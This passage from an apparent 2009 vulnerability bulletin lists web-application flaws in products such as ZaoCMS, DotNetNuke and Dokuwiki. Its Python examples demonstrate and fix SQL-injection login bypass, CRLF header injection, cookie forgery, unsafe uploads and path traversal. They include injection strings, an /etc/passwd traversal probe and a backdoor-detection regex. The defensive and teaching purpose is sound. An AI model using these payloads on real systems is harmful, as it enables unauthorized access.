  • Description: Catviz is a web-based content manager. The application is exposed to multiple issues because it fails to properly sanitize user-supplied input. The attacker may leverage a cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Catviz version 0.4 beta 1 is affected.
  • Ref: http://www.securityfocus.com/bid/35042

  • 09.22.30 - CVE: CVE-2009-1729
  • Platform: Web Application - Cross Site Scripting
  • Title: Sun Java System Communications Express "search.xml" Cross-Site Scripting
  • Description: Sun Java System Communications Express is a web-based client for the Sun Java Communications Suite. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue affects the "abperson_displayName" parameter of the "search.xml" script. Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6 and Sun Java System Communications Express 6 2005Q4 (6.2) are affected.
  • Ref: http://www.securityfocus.com/archive/1/503675

  • 09.22.31 - CVE: CVE-2009-1729
  • Platform: Web Application - Cross Site Scripting
  • Title: Sun Java System Communications Express "UWCMain" Cross-Site Scripting
  • Description: Sun Java System Communications Express is a web-based client for the Sun Java Communications Suite. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue affects the "temporaryCalendars" parameter of the "UWCMain" script. Sun Java System Communications Express 6.3 for Sun Java Communications Suite 5 and 6 and Sun Java System Communications Express 6 2005Q4 (6.2) are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-258068-1

  • 09.22.32 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Web Conference Room Free Unspecified Cross-Site Scripting
  • Description: Web Conference Room Free is a web-based conferencing application. The application is exposed to an unspecified cross-site scripting issue because it fails to sanitize user-supplied input. Web Conference Room Free versions prior to 1.6.4 are affected.
  • Ref: http://www.securityfocus.com/bid/35068

  • 09.22.33 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: a-News Unspecified Cross-Site Scripting
  • Description: a-News is a web-based application used to post news items. The application is exposed to an unspecified cross-site scripting issue because it fails to sanitize user-supplied input. a-News version 2.32 is affected.
  • Ref: http://www.securityfocus.com/bid/35070

  • 09.22.34 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DotNetNuke "ErrorPage.aspx" Cross-Site Scripting
  • Description: DotNetNuke is an open-source framework used to create and deploy websites. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "error" parameter of the "ErrorPage.aspx" script. DotNetNuke versions prior to 4.9.4 are affected.
  • Ref: http://www.securityfocus.com/archive/1/503723

  • 09.22.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Sun Java System Portal Server Error Page Cross-Site Scripting
  • Description: Sun Java System Portal Server is a Java-based framework for developing web applications. The application is exposed to a cross-site scripting issue because it fails to sufficiently sanitize user-supplied input. This issue exists in one of the error pages. Sun Java System Portal Server versions 6.3.1, 7.1 and 7.2 are affected.
  • Ref: http://www.securityfocus.com/bid/35079

  • 09.22.36 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Article Directory Script "yad-admin/login.php" SQL Injection
  • Description: Article Directory Script is a PHP-based content management application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "User Name" textbox when logging in as an administrator via the "yad-admin/login.php" script.
  • Ref: http://www.securityfocus.com/bid/35059

  • 09.22.37 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Flash Quiz Multiple SQL Injection Vulnerabilities
  • Description: Flash Quiz is a PHP-based quiz application. Flash Quiz is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data. Flash Quiz Beta version 2 is affected.
  • Ref: http://www.securityfocus.com/bid/35060

  • 09.22.38 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Your Articles Directory "page.php" SQL Injection
  • Description: Your Articles Directory is a PHP-based content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "page.php" script.
  • Ref: http://www.securityfocus.com/bid/35062

  • 09.22.39 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: IPcelerate IPsession Unspecified SQL Injection
  • Description: IPcelerate IPsession is an IP telephony device; the device has a web-based management interface listening on TCP port 8090. The device's web-based interface is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data before using it in an SQL query to unspecified scripts and parameters used in the authentication process.
  • Ref: http://www.securityfocus.com/archive/1/503686

  • 09.22.40 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: DM FileManager "Username" and "Password" SQL Injection Vulnerabilities
  • Description: DM FileManager is a web-based file management tool. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Username" and "Password" fields in the admin login page before using it in an SQL query. DM FileManager version 3.9.2 is affected.
  • Ref: http://www.securityfocus.com/bid/35035

  • 09.22.41 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! Casino Component "Itemid" Parameter Multiple SQL Injection Vulnerabilities
  • Description: Casino is a gambling component for the Joomla! content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Itemid" parameter. Casino version 0.3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/35041

  • 09.22.42 - CVE: CVE-2009-1751
  • Platform: Web Application - SQL Injection
  • Title: Realty Web-Base "list_list.php" Parameter SQL Injection
  • Description: Realty Web-Base is a content manager application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "list_list.php" script before using it in an SQL query. Realty Web-Base version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/35043

  • 09.22.43 - CVE: CVE-2008-6794
  • Platform: Web Application - SQL Injection
  • Title: Scripts for Sites EZ Pub Site "directory.php" SQL Injection
  • Description: Scripts for Sites EZ Pub Site is a web-based application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "directory.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/35046

  • 09.22.44 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: 26th Avenue bSpeak "forum/index.php" SQL Injection
  • Description: 26th Avenue bSpeak is a threaded message board. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "forumid" parameter of the "forum/index.php" script before using it in an SQL query. 26th Avenue bSpeak version 1.10 is affected.
  • Ref: http://www.securityfocus.com/bid/35049

  • 09.22.45 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: LxBlog Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: LxBlog is a PHP-based blogging application. The application is exposed to multiple issues, because it fails to adequately sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  • Ref: http://www.securityfocus.com/bid/35071

  • 09.22.46 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: ZaoCMS "admin/modules/Users/edit_user.php" SQL Injection
  • Description: ZaoCMS is a PHP-based content manager. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "user_id" parameter of the "admin/modules/Users/edit_user.php" script.
  • Ref: http://www.securityfocus.com/bid/35077

  • 09.22.47 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Saman Portal "pageid" Parameter SQL Injection
  • Description: Saman Portal is a web-based application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "pageid" parameter of the "index.php" script.
  • Ref: http://www.securityfocus.com/bid/35084

  • 09.22.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Joomla! Boy Scout Advancement "id" Parameter Multiple SQL Injection Vulnerabilities
  • Description: Boy Scout Advancement (BSAdv) is a scout component for the Joomla! content manager. The component is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "id" parameter when the "task" parameter is set to the following: "event" and "account". Boy Scout Advancement version 0.3 is affected.
  • Ref: http://www.securityfocus.com/archive/1/503794

  • 09.22.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: vbPlaza "name" Parameter SQL Injection
  • Description: vbPlaza is a forum module for vBulletin. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "name" parameter of the "vbplaza.php" script before using it in an SQL query.
  • Ref: http://www.securityfocus.com/bid/35099

  • 09.22.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: phpBugTracker "index.php" SQL Injection
  • Description: phpBugTracker is a web-based bug tracking system. phpBugTracker is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "password" parameter of the "index.php" script before using it in an SQL query. phpBugTracker version 1.0.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35101

  • 09.22.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Graphiks MyForum Login Multiple SQL Injection Vulnerabilities
  • Description: Graphiks MyForum is a web-based application. The application is exposed to multiple SQL injection issues because it fails to adequately sanitize user-supplied input to the "Username" and "Password" fields of the login script. MyForum version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35096

  • 09.22.52 - CVE: Not Available
  • Platform: Web Application
  • Title: JobScript "mycv.php" Arbitrary File Upload
  • Description: JobScript is a PHP-based job board. The application is exposed to an issue that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately validate user-supplied input before uploading files via the "mycv.php" script. JobScript version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/35058

  • 09.22.53 - CVE: Not Available
  • Platform: Web Application
  • Title: ZaoCMS Insecure Cookie Authentication Bypass
  • Description: ZaoCMS is a web application. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting the "admin" cookie parameter to "stgAdmin" and the "path" parameter to "/" via the "admin/login.php" script.
  • Ref: http://www.securityfocus.com/bid/35063

  • 09.22.54 - CVE: CVE-2009-1594, CVE-2009-1593
  • Platform: Web Application
  • Title: Profense Web Application Firewall Security Bypass Vulnerabilities
  • Description: Profense is a web application firewall. Profense is exposed to multiple remote issues. An attacker can exploit these issues to bypass certain security restrictions and perform various web-application attacks. Profense versions prior to 2.4.4 and 2.2.22 are affected.
  • Ref: http://www.securityfocus.com/archive/1/503649

  • 09.22.55 - CVE: Not Available
  • Platform: Web Application
  • Title: ASP Inline Corporate Calendar Cross-Site Scripting and SQL Injection Vulnerabilities
  • Description: ASP Inline Corporate Calendar is an ASP-based calendar application. The application is exposed to multiple issues because it fails to adequately sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  • Ref: http://www.securityfocus.com/bid/35054

  • 09.22.56 - CVE: Not Available
  • Platform: Web Application
  • Title: VICIDIAL Call Center Suite "admin.php" Multiple SQL Injection Vulnerabilities
  • Description: VICIDIAL Call Center Suite is an application for managing Asterisk PBX telephony implementations. The application is prone to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Username" and "Password" textboxes when logging in to the application through the "admin.php" script. VICIDIAL Call Center Suite version 2.0.5-173 is affected.
  • Ref: http://www.securityfocus.com/bid/35056
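The login-form injection shared by the DM FileManager, phpBugTracker, Graphiks MyForum and VICIDIAL entries above, as an added example in Python with SQLite. This is illustrative code written for this bulletin, not code from any of those products; the table layout, the credentials and the two attack strings are constructed, and the password column is stored in clear text only so the injected query stays readable.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: one administrator row. Clear-text passwords
    are used here only to keep the injection visible; real code stores hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the WHERE clause by string concatenation, so the form fields are
    parsed as SQL. Returns the matched user name, or None when login fails."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn: sqlite3.Connection, username: str, password: str):
    """Same lookup with bound parameters: the driver passes the fields as data,
    so quotes and comment markers in them never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Two classic login-bypass inputs. The first closes the username literal and
# comments out the password check; the second turns the password check into
# a tautology (AND binds tighter than OR, so the OR clause decides).
COMMENT_OUT = "admin' --"
TAUTOLOGY = "' OR '1'='1"


def run_demo() -> dict:
    conn = make_db()
    return {
        "vuln_comment":    login_vulnerable(conn, COMMENT_OUT, "wrong"),  # 'admin'
        "vuln_tautology":  login_vulnerable(conn, "nobody", TAUTOLOGY),   # 'admin'
        "fixed_comment":   login_fixed(conn, COMMENT_OUT, "wrong"),       # None
        "fixed_tautology": login_fixed(conn, "nobody", TAUTOLOGY),        # None
        "fixed_real":      login_fixed(conn, "admin", "S3cret!"),         # 'admin'
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result!r}")
```

The fixed version is the whole remediation for this class: with placeholders, the "Username" and "Password" fields can contain any characters and the query shape never changes. Escaping functions are a weaker substitute because they must be applied at every call site and depend on the database's quoting rules.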

  • 09.22.57 - CVE: CVE-2009-1734
  • Platform: Web Application
  • Title: VidShare Pro SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: VidShare Pro is a PHP-based web application. The application is exposed to multiple issues because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  • Ref: http://www.securityfocus.com/bid/35033

  • 09.22.58 - CVE: Not Available
  • Platform: Web Application
  • Title: DMXReady Registration Manager "assetmanager.asp" Arbitrary File Upload
  • Description: DMXReady Registration Manager is a web-site registration application implemented in ASP. The application is exposed to an issue that lets attackers upload arbitrary files. The problem occurs because the "assetmanager.asp" script fails to restrict the types or extensions of files uploaded to the server. DMXReady Registration Manager version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/35039

  • 09.22.59 - CVE: Not Available
  • Platform: Web Application
  • Title: NC GBook "index.php" Remote PHP Code Injection
  • Description: NC GBook is a PHP-based guestbook application. The application is exposed to an issue that attackers can leverage to execute arbitrary PHP code in the context of the application. This issue occurs because the application fails to sufficiently sanitize input supplied via the "Autor", "E-Mail", and "Homepage" fields when a new guestbook entry is added via the "index.php" script. NC GBook version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/35044

  • 09.22.60 - CVE: Not Available
  • Platform: Web Application
  • Title: NC LinkList "index.php" Remote PHP Code Injection
  • Description: NC LinkList is a PHP-based web application. The application is exposed to an issue that attackers can leverage to execute arbitrary PHP code in the context of the application. This issue occurs because the application fails to sufficiently sanitize input supplied via the "Ihr Name" field when a new link comment is added via the "index.php" script. NC LinkList version 1.3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/35045

  • 09.22.61 - CVE: CVE-2009-1591
  • Platform: Web Application
  • Title: CGI Rescue WEB Mailer HTTP Header Injection
  • Description: CGI Rescue WEB Mailer is a web application. The application is exposed to an issue that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. This issue is caused by a failure to handle carriage return and line feed characters in unspecified fields. WEB Mailer versions prior to 1.04 are affected.
  • Ref: http://jvndb.jvn.jp/en/contents/2009/JVNDB-2009-000024.html
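How the CR/LF handling failure in the WEB Mailer entry above turns into an injected header, and the check that closes it, as an added Python example. This is not code from CGI Rescue; the advisory does not name the affected fields, so the redirect-target field, the CGI-style "Status:" header block and the attacker input are assumptions constructed for the illustration.

```python
import re


def redirect_vulnerable(return_url: str) -> str:
    """Copies a form field into a CGI response header unchanged. The field is
    hypothetical; the point is that nothing strips line breaks from it."""
    return "Status: 302 Found\r\nLocation: " + return_url + "\r\n\r\n"


def header_value(value: str):
    """Returns the value if it may be placed in a header, else None. CR, LF
    and NUL are the characters that end or split a header line."""
    if re.search(r"[\r\n\x00]", value):
        return None
    return value


def redirect_fixed(return_url: str) -> str:
    safe = header_value(return_url)
    if safe is None:
        return "Status: 400 Bad Request\r\n\r\n"
    return "Status: 302 Found\r\nLocation: " + safe + "\r\n\r\n"


def parse_header_block(raw: str) -> dict:
    """Splits a header block the way the web server or browser will: one
    header per CRLF-delimited line, everything after the blank line is body."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


# Constructed attacker input: a plausible path followed by a line break and a
# second header. A CGI library would already have URL-decoded %0d%0a into the
# raw CR LF characters used here.
INJECTED = "/thanks.html\r\nSet-Cookie: session=attacker-chosen"


if __name__ == "__main__":
    print(parse_header_block(redirect_vulnerable(INJECTED)))
    print(parse_header_block(redirect_fixed(INJECTED)))
```

The same input with a doubled line break ("\r\n\r\n<html>...") ends the header block early and lets the attacker supply the body, which is the response-splitting variant; the `header_value` check rejects both because it refuses the line-break characters rather than trying to recognise particular header names.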

  • 09.22.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Jorp "functions.php" Authentication Bypass
  • Description: Jorp is a web-based project management application. The application is exposed to an authentication bypass issue because it fails to perform adequate authentication checks. Specifically, an attacker may delete arbitrary projects or tasks. This issue affects the "y" parameter of the "functions.php" script. Jorp version 1.3.05.09 is affected.
  • Ref: http://www.securityfocus.com/archive/1/503678

  • 09.22.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Drupal Views Bulk Operations Security Bypass
  • Description: "Views bulk operations" is a third-party plugin module for the Drupal content manager. The module performs bulk updates of nodes. The module is exposed to a security bypass issue that may allow attackers to perform certain actions on specific nodes or classes of nodes without proper authorization. "Views bulk operations" versions prior to 5.x-1.4 and 6.x-1.7 are affected.
  • Ref: http://drupal.org/node/468450

  • 09.22.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Tutorial Share Insecure Cookie Authentication Bypass
  • Description: Tutorial Share is a web application implemented in PHP. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting the "usernamed" cookie parameter to an administrator's username and the "path" parameter to "/" via the "admin/index.php" script. Tutorial Share version 3.4 is affected.
  • Ref: http://www.securityfocus.com/bid/35075
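The insecure-cookie pattern in the ZaoCMS and Tutorial Share entries above, beside a cookie the client cannot author, as an added Python example. None of this is code from either product: the cookie names, the claims layout and the secret key are assumptions constructed for the illustration, and the "admin=stgAdmin" value is the one the ZaoCMS advisory describes.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical server-side secret. In practice it is generated at install time
# and kept outside the web root; it is never derived from anything the client sends.
SECRET_KEY = b"constructed-secret-for-this-example"


def is_admin_vulnerable(cookies: dict) -> bool:
    """The flawed check: the cookie value itself is the proof of identity, so
    any browser that sets admin=stgAdmin is an administrator."""
    return cookies.get("admin") == "stgAdmin"


def issue_session(username: str, role: str, key: bytes = SECRET_KEY) -> str:
    """Encodes the session claims and appends an HMAC-SHA256 tag over them."""
    payload = base64.urlsafe_b64encode(
        json.dumps({"u": username, "r": role}).encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def read_session(cookie: str, key: bytes = SECRET_KEY):
    """Returns the claims only if the tag verifies; None for anything else."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(payload))
    except ValueError:   # covers bad base64 and bad JSON
        return None


def is_admin_fixed(cookies: dict) -> bool:
    claims = read_session(cookies.get("session", ""))
    return claims is not None and claims.get("r") == "admin"


def forge_admin(cookie: str) -> str:
    """What an attacker can do without the key: rewrite the claims and keep
    the old tag. The tag no longer matches, so read_session rejects it."""
    _payload, _sep, tag = cookie.rpartition(".")
    forged = base64.urlsafe_b64encode(
        json.dumps({"u": "attacker", "r": "admin"}).encode()).decode()
    return forged + "." + tag
```

The fix is not the particular encoding but the principle: authorization state that the client can present must be either opaque (a random session identifier looked up server-side) or authenticated with a key the client does not have. A signed cookie still needs the usual transport protections (the Secure and HttpOnly flags) so that the valid tag is not simply stolen.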

  • 09.22.65 - CVE: Not Available
  • Platform: Web Application
  • Title: ZaoCMS "upload.php" Arbitrary File Upload
  • Description: ZaoCMS is a PHP-based content manager. The application is exposed to an issue that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately validate user-supplied input before uploading files via the "upload.php" script.
  • Ref: http://www.securityfocus.com/bid/35078
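The arbitrary-upload pattern in the JobScript, DMXReady Registration Manager and ZaoCMS entries above, and the validation a practitioner would expect, as an added Python example. This is not code from any of those products; the allowed types, the magic bytes, and the two directory paths are assumptions constructed for the illustration, and only the path computation is shown (no file is written).

```python
import os
import re
import secrets

# Hypothetical upload policy for a CV/asset form: allowed extension -> bytes
# the content must start with (None = no content check for that type).
ALLOWED_TYPES = {"pdf": b"%PDF", "txt": None}
WEB_ROOT_UPLOADS = "/var/www/html/uploads"   # assumed layout of the vulnerable form
PRIVATE_UPLOADS = "/var/app/uploads"         # assumed layout, outside the web root

# Exactly one name part and one extension: double extensions (cv.php.pdf),
# traversal sequences and NUL bytes all fail this expression.
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,8})")


def store_path_vulnerable(client_filename: str) -> str:
    """The flawed pattern: the client's file name is used as-is, under the
    web root, with no type check, so 'cv.php' lands where the web server
    will execute it."""
    return os.path.join(WEB_ROOT_UPLOADS, client_filename)


def validate_upload(client_filename: str, content: bytes):
    """Returns a server-chosen file name, or None to reject. The client name
    is consulted only for its single extension, which must be on the allow
    list, and the content must match the declared type."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    match = _SAFE_NAME.fullmatch(base)
    if match is None:
        return None
    ext = match.group(1).lower()
    if ext not in ALLOWED_TYPES:
        return None
    magic = ALLOWED_TYPES[ext]
    if magic is not None and not content.startswith(magic):
        return None
    return secrets.token_hex(16) + "." + ext


def store_path_fixed(client_filename: str, content: bytes):
    name = validate_upload(client_filename, content)
    return None if name is None else os.path.join(PRIVATE_UPLOADS, name)
```

Storing under a server-generated name outside the web root, and serving the file back through a handler that sets the content type, is what makes the extension check sufficient: even if a type check is later loosened, the uploaded bytes are never reachable as a script URL.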

  • 09.22.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Multiple Mole Group Products "admin.php" Remote Password Change
  • Description: Mole Group provides several web-based PHP applications. Multiple Mole Group products are exposed to an issue that may permit attackers to change the password of arbitrary administrator users. An attacker may exploit this issue by submitting an HTTP POST request containing malicious data to the "admin/admin.php" script.
  • Ref: http://www.securityfocus.com/bid/35079

  • 09.22.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Zeeways PHOTOVIDEOTUBE Multiple Remote Vulnerabilities
  • Description: Zeeways PHOTOVIDEOTUBE is a PHP-based web application. The application is exposed to multiple remote issues. The attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, gain unauthorized access to the affected application, or execute arbitrary HTML or JavaScript code within the context of the affected site. Zeeways PHOTOVIDEOTUBE version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/35080

  • 09.22.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Cute Editor for ASP.NET "file" Parameter Directory Traversal
  • Description: Cute Editor for ASP.NET is a WYSIWYG browser-based online HTML editor. The application is exposed to a directory traversal issue because it fails to sufficiently sanitize user-supplied input to the "file" parameter of the "Load.ashx" script. A remote attacker could exploit the vulnerability using directory-traversal characters ("../") to access arbitrary files that contain sensitive information that could aid in further attacks.
  • Ref: http://www.securityfocus.com/bid/35085

  • 09.22.69 - CVE: Not Available
  • Platform: Web Application
  • Title: Basic Analysis And Security Engine Cross-Site Scripting and HTML Injection Vulnerabilities
  • Description: Basic Analysis And Security Engine (BASE) provides a web front-end to query and analyze alerts coming from the Snort IDS. BASE is exposed to multiple cross-site scripting and HTML injection issues because it fails to sufficiently sanitize user-supplied data. These issues affect the "base_ag_main.php" and "base_qry_main.php" scripts. BASE version 1.4.2 is affected.
  • Ref: http://base.secureideas.net/

  • 09.22.70 - CVE: Not Available
  • Platform: Web Application
  • Title: MiniTwitter SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: MiniTwitter is a PHP-based application. The application is exposed to multiple security issues. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MiniTwitter version 0.3 Beta is affected.
  • Ref: http://www.securityfocus.com/archive/1/503775

  • 09.22.71 - CVE: Not Available
  • Platform: Web Application
  • Title: AMember Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
  • Description: AMember is a PHP application that manages membership and subscription for a web site. AMember is exposed to multiple input validation issues. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. AMember version 3.1.7 is affected.
  • Ref: http://www.securityfocus.com/archive/1/503776

  • 09.22.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Dokuwiki "doku.php" Local File Include
  • Description: Dokuwiki is a PHP-based wiki application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "config_cascade[main][default][]" parameter of the "doku.php" script. Dokuwiki versions 2009-02-14, rc2009-02-06, and rc2009-01-30 are affected.
  • Ref: http://www.securityfocus.com/bid/35095

  • 09.22.73 - CVE: Not Available
  • Platform: Web Application
  • Title: WP-Lytebox "main.php" Local File Include
  • Description: WP-Lytebox is a PHP-based plugin for the WordPress weblog application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "pg" parameter of the "main.php" script. WP-Lytebox version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/35098

  • 09.22.74 - CVE: Not Available
  • Platform: Web Application
  • Title: cpCommerce "GLOBALS[prefix]" Local/Remote File Include
  • Description: cpCommerce is a web-based e-commerce application. The application is exposed to a local/remote file include issue because it fails to sufficiently sanitize user-supplied input to the "GLOBALS[prefix]" parameter of the "_functions.php" script. cpCommerce versions in the 1.2.x branch are affected.
  • Ref: http://www.securityfocus.com/bid/35103
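The path-parameter failure behind the Cute Editor directory traversal entry and the WP-Lytebox and cpCommerce file-include entries above, with the containment check and the allow-list lookup that fix it, as an added Python example. This is not code from any of those products; the base directory, the page map and the test paths are assumptions constructed for the illustration. The DokuWiki "config_cascade" case is listed with these but has a different root cause (request data overriding an internal configuration array), where the fix is not to let that array be sourced from the request at all.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical directory that a "file" or "pg" parameter is meant to address.
BASE_DIR = "/var/www/app/templates"


def resolve_vulnerable(base: str, user_path: str) -> str:
    """Joins the parameter onto the base directory and normalises it, which is
    all a bare include($dir . $_GET['pg']) does: '../' walks out of base."""
    return posixpath.normpath(posixpath.join(base, user_path))


def resolve_contained(base: str, user_path: str):
    """Returns the resolved path only if it stays inside base, else None.
    The parameter is URL-decoded once (as the web server would), NUL bytes are
    rejected, and containment uses commonpath rather than a string prefix so
    that 'templates2' is not mistaken for a child of 'templates'."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        return None
    base_norm = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base_norm, decoded))
    if posixpath.commonpath([base_norm, full]) != base_norm:
        return None
    return full


# Stricter still, and the right shape for an include parameter: map the page
# names the application actually offers to files, and look the parameter up.
INCLUDABLE_PAGES = {"about": "pages/about.php", "gallery": "pages/gallery.php"}  # constructed


def resolve_allowlisted(page: str):
    rel = INCLUDABLE_PAGES.get(page)
    return None if rel is None else posixpath.join(BASE_DIR, rel)


if __name__ == "__main__":
    probe = "../../../../etc/passwd"
    print(resolve_vulnerable(BASE_DIR, probe))        # /etc/passwd
    print(resolve_contained(BASE_DIR, probe))         # None
    print(resolve_allowlisted("about"))               # /var/www/app/templates/pages/about.php
```

Two caveats on the containment check: it reasons about path strings, so a symbolic link inside the base directory can still point outside it (use `os.path.realpath` against the real filesystem before comparing), and for a PHP include the remote variant in the cpCommerce entry additionally depends on the interpreter's allow_url_include setting, which should be off regardless of how the parameter is validated.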

  • 09.22.75 - CVE: Not Available
  • Platform: Web Application
  • Title: RSGallery2 Component for Mambo/Joomla! Backdoor
  • Description: RSGallery2 is a gallery component for the Mambo/Joomla! content managers. RSGallery2 is exposed to a backdoor issue. The backdoor resides in the "includes/rsgallery.class.php" and "language/english-utf8.php" scripts. The scripts contain "eval()", "execute()", and "shell_exec()" function calls with a user-supplied "POST" argument. RSGallery2 versions 1.14.3 and 2.0.0b1 are affected.
  • Ref: http://www.securityfocus.com/archive/1/503824
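A triage scan for the pattern the RSGallery2 entry above describes (an eval or shell_exec call fed from a POST argument inside an otherwise ordinary component file), as an added Python example. The scanner is written for this bulletin, not taken from any project, and the sample tree is a constructed stand-in that only reproduces the shape the advisory describes; it is not the real RSGallery2 source.

```python
import re

# PHP functions that turn a string into code or a shell command, and the
# request superglobals an attacker controls. A call whose argument list
# mentions a superglobal before the statement ends is flagged.
DANGEROUS_CALLS = (r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen"
                   r"|proc_open|create_function)\s*\(")
SUPERGLOBALS = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
BACKDOOR_RE = re.compile(DANGEROUS_CALLS + r"[^;]*?" + SUPERGLOBALS, re.IGNORECASE)


def scan_source(path: str, source: str) -> list:
    """Returns (path, line number, stripped line) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if BACKDOOR_RE.search(line):
            hits.append((path, lineno, line.strip()))
    return hits


def scan_tree(files: dict) -> list:
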